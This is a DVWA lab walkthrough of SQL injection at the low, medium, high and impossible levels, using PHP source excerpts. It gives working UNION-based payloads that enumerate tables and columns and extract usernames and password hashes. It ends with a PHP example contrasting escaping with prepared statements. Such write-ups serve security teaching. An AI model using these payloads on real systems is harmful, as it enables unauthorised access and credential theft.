1. Low level (low.php)
Look at the source code first: the id parameter is read straight from the request and placed directly into the SQL statement that is executed.
    if( isset( $_REQUEST[ 'Submit' ] ) ) {
        // Get input
        $id = $_REQUEST[ 'id' ];

        // Check database (the value is concatenated into the query with no validation)
        $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
        // ... query executed and the rows echoed back to the page
    }
http://localhost/dvwa-master/vulnerabilities/sqli/?id=1&submit=Submit#
Submitting a single quote directly makes the page throw a database error, and the error message shows that a single quote can be used to close the string in the query.
http://localhost/DVWA-master/vulnerabilities/sqli/?id=1 '&submit=Submit#
check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1
Use ORDER BY to determine the number of columns returned by the query.
http://localhost/DVWA-master/vulnerabilities/sqli/?id=1' ORDER by 3%23&submit=Submit#
With ORDER BY 2 the page displays normally, so the query returns two columns.
Use UNION SELECT to query user() and database().
http://localhost/DVWA-master/vulnerabilities/sqli/?id=1' union select user(),database()%23&Submit=Submit#
Query the table names.
http://localhost/DVWA-master/vulnerabilities/sqli/?id=0' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa'%23&submit=Submit#
Query the column names of the users table.
http://localhost/DVWA-master/vulnerabilities/sqli/?id=0' union select 1,group_concat(column_name) from information_schema.columns where table_schema='dvwa' and table_name='users'%23&submit=Submit#
Query the data.
http://localhost/DVWA-master/vulnerabilities/sqli/?id=0' union select user,password from dvwa.users limit 0,1%23&submit=Submit#
The password values returned can be decrypted.
2. Medium level (medium.php)
Looking at the difference: the id parameter is now taken from $_POST instead of $_REQUEST, and mysqli_real_escape_string() is used to escape the special characters in the string before it is used in the SQL statement.
    if( isset( $_POST[ 'Submit' ] ) ) {
        // Get input
        $id = $_POST[ 'id' ];
        $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);

        // The escaped value is still used unquoted, as an integer
        $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
        $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );
        // ...
    }
The most direct effect is that ' is escaped as \', so an attacker cannot close the quotes and a string-context injection fails.
If the MySQL client connection uses the GBK character set, a wide-byte injection becomes possible; see http://netsecurity.51cto.com/art/201404/435074.htm and https://www.cnblogs.com/superkrissV/p/8379690.html
Because the id parameter is used as an integer here, no closing quote is needed, so injection still works as normal. The id is placed into the query as an integer:
    SELECT first_name, last_name FROM users WHERE user_id = $id;
Use the HackBar plugin to submit the POST data; in a POST form, do not encode # as %23.
id=0 union select 1,2#&Submit=Submit
Extract the data the same way as in the low level.
id=0 union select user,password from dvwa.users limit 0,1#&Submit=Submit
3. High level (high.php)
The id parameter is taken from the session. Because session data is stored on the server side, many programmers validate only data that comes from the client and regard server-side data as safe.
    if( isset( $_SESSION[ 'id' ] ) ) {
        // Get input
        $id = $_SESSION[ 'id' ];

        // Check database (session value trusted without validation)
        $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
        $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>Something went wrong.</pre>' );
        // ...
    }
Clicking the link pops up a page at the corresponding URL.
http://localhost/DVWA-master/vulnerabilities/sqli/session-input.php
Review the source code.
Looking at the source of session-input.php, the id parameter is written straight into the session without any processing.
    if( isset( $_POST[ 'id' ] ) ) {
        $_SESSION[ 'id' ] = $_POST[ 'id' ];
        //$page[ 'body' ] .= "Session ID set!<br /><br /><br />";
        $page[ 'body' ] .= "Session ID: {$_SESSION[ 'id' ]}<br /><br /><br />";
        $page[ 'body' ] .= "<script>window.opener.location.reload(true);</script>";
    }
With this understood, injection is possible: the injection point is session-input.php, and the page that displays the result is index.php.
http://localhost/DVWA-master/vulnerabilities/sqli/session-input.php
POST submission:
id=0' union select user,password from dvwa.users#&Submit=Submit
Refresh
http://localhost/DVWA-master/vulnerabilities/sqli/index.php
4. Impossible level (impossible.php)
Looking at the source code, PDO prepared statements are used to prevent SQL injection, and id is bound as an integer.
    $id = $_GET[ 'id' ];

    // Was a number entered?
    if( is_numeric( $id ) ) {
        // Check the database
        $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
        $data->bindParam( ':id', $id, PDO::PARAM_INT );
        $data->execute();
        $row = $data->fetch();
        // ...
    }
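To see why escaping alone fails in the medium level's unquoted integer context while the impossible level's numeric check plus typed binding holds, here is an added example (not DVWA's own code) that runs both query styles against an in-memory SQLite table. It assumes the pdo_sqlite extension is available, uses addslashes() as a stand-in for mysqli_real_escape_string() (which needs a live MySQL connection), constructs the users table and its single row, and drops the trailing # from the page's payload because SQLite has no # comments.

```php
<?php
// Added example, not DVWA code. Assumption: pdo_sqlite is installed.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

// Constructed sample table and row (the hash value is a placeholder).
$db->exec('CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT, user TEXT, password TEXT)');
$db->exec("INSERT INTO users VALUES (1, 'admin', 'admin', 'admin', 'constructed-hash-value')");

// Medium level: escape the value, then use it unquoted in the query.
function mediumQuery(PDO $db, string $id): array {
    $id = addslashes($id);   // stand-in for mysqli_real_escape_string(); no quotes in the payload, so nothing changes
    $query = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    return $db->query($query)->fetchAll(PDO::FETCH_NUM);
}

// Impossible level: reject non-numeric input, then bind the value as an integer.
function impossibleQuery(PDO $db, string $id): array {
    if (!is_numeric($id)) {
        return [];           // anything that is not a plain number never reaches the database
    }
    $data = $db->prepare('SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;');
    $data->bindParam(':id', $id, PDO::PARAM_INT);
    $data->execute();
    return $data->fetchAll(PDO::FETCH_NUM);
}

// The medium-level payload from this page, minus the MySQL-only # comment.
$payload = '0 union select user,password from users limit 0,1';

print_r(mediumQuery($db, $payload));      // escaping did nothing: the password column is returned
print_r(impossibleQuery($db, $payload));  // is_numeric() rejects the payload: empty array
print_r(impossibleQuery($db, '1'));       // a legitimate lookup still returns the admin row
```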